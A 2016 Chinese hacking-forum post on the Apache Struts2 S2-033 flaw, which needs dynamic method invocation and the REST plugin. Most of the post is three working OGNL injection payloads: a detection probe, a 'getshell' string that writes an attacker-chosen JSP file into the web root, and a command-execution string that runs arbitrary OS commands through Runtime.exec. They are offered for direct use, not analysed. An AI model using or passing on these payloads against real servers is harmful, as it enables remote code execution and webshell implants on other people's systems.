搜索
查看: 854|回复: 0

s2-033三种POC+命令执行绕过

[复制链接]

432

主题

573

帖子

2543

积分

核心成员

Rank: 8Rank: 8

积分
2543
发表于 2016-6-7 16:39:38 | 显示全部楼层 |阅读模式
s2-033背景:

      漏洞建立在032的基础上,还是对method没有进行过滤导致的,但是032的payload的要做转变才能检测
      
      启用动态调用方法为true
   
      支持rest插件

rest介绍:
      使用http://localhost:8080/bee/action-name/1/XXX这种请求方式,其实XXX可以是任何合法的名字
   
      Struts2会查找XXX为名字的方法来调用,比如请求http://localhost:8080/bee/test/1/abc,那么TestAction的public String abc()就会被调用



检测poc:

        
  1. <font color="#000"><font face="Verdana,"> </font></font><font color="#000"><font face="Verdana,">%23_memberAccess%<a href="mailto:3d@ognl.OgnlContext">3d@ognl.OgnlContext</a>@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[0]),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908 </font></font>
复制代码


[/url]
getshell POC:

  1. %23_memberAccess%<a href="mailto:3d@ognl.OgnlContext">3d@ognl.OgnlContext</a>@DEFAULT_MEMBER_ACCESS,%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c)%2b%23parameters.reqobj[2],%23fos%3dnew java.io.FileOutputStream(%23b),%23fos.write(%23parameters.content[0].getBytes()),%23fos.close(),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),%23parameters.command[0].toString.json?&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=test.jsp&content=内容
复制代码


[url=http://static.wooyun.org/upload/image/201606/2016060713493645563.png]

命令执行POC:

  1. <font color="#000"><font face="Verdana,">%23_memberAccess%<a href="mailto:3d@ognl.OgnlContext">3d@ognl.OgnlContext</a>@DEFAULT_MEMBER_ACCESS,%23xx%3d123,</font></font><font color="#000"><font face="Verdana,">%23rs%<a href="mailto:3d@org.apache.commons.io.IOUtils">3d@org.apache.commons.io.IOUtils</a>@toString(@</font></font><font color="#000"><font face="Verdana,">java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=whoami </font></font>
复制代码

[url=http://static.wooyun.org/upload/image/201606/2016060713503553096.png][/url]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?Join BUC

x
您可以更新记录, 让好友们知道您在做什么...
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表